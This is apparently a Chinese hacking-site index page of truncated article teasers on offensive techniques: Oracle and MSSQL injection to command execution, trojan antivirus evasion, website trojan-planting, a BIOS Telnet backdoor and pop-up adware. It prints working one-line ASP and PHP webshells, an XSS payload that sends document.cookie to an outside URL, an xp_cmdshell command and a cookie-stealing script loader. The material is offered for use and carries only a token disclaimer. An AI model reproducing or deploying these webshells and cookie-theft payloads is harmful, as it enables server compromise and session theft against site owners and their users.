小编 犀利的 oracle 注入技术
犀利的 oracle 注入技术 原文发表在黑客手册 linx 2008.1.12 介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。 以下的演示都是在web上的sql plus执行的,在web注入时 把selec...
也想出现在这里?
联系我们吧
一句话木马(asp,php) 总结篇
asp一句话 <%execute(request("1"))%> php一句话 <?php eval($_POST[1]);?> aspx一句话 <script language="C#&qu...
CSRF—攻击与防御
0x01 什么是CSRF攻击 CSRF是Cross Site Request Forgery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做,你可以把...
mssql的sa权限执行命令方法总结
测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动) 一.xp_cmdshell EXEC master..xp_cmdshell ‘ipconfig’ 开启xp_c...
弹窗口的流氓软件核心代码
ps:请勿用于非法用途,仅供技术研究之用。 by:yunshu 这个东西的主要功能就是去网上一个URL读取配置文件,拿到需要弹出的窗口以及周期时间,然后开始弹……程序安装成服务,并设置为自动启动。启动之后写入一段代码到exp...
asp php XSS获取cookie的代码
<script>document.write(\'<img src="http://url/news.asp?msg=\’+document.cookie+\’" width=0 heigh...
用U盘就可黑进有密码的Windows系统
【赛迪网-IT技术报道】U盘 如今可以说非常普及了,不过,如果只是把它用来存储数据的话,也许有点可惜了。其实,我们还可以让U盘发挥更大的能量!今天小编教你一招,能让你的U盘代 替登录系统的密码,只有当你插上U盘才能正常进入系统操作,否则任何操作都无法进...
冰河暗涌防不胜防 BIOS下实现的Telnet后门
该项目仅为实验性项目,主要目的是想隐藏一个Telnet后门在主板的BIOS内,并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受控制。 项目涉及的相关知识及技术目录 1、 实验环境,使用bochs调试工具。 2...
木马免杀绝招以及常用的修改方法
常用的木马免杀方法绝招一:快速搞定瑞星文件查杀操作步骤: 第一步:用OD载入,来到程序的入口点。 …常用的木马免杀方法 绝招一:快速搞定瑞星文件查杀 操作步骤: 第一步:用OD载入,来到程序的入口点。 第二步:把入口点的第一句PUSH...
网页挂马详细步骤教程
其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。 下面我介绍5种方法,我一个一个介绍 方法一:这个就是最简单的了,只要你懂点html语言 把下面这段代码插进网...
asp+js 偷取Cookies源代码
偷取Cookie,通过以下脚本引入一个js,document.write("<script src=XX.js></script>"),然后js内容为: var code; var targ...
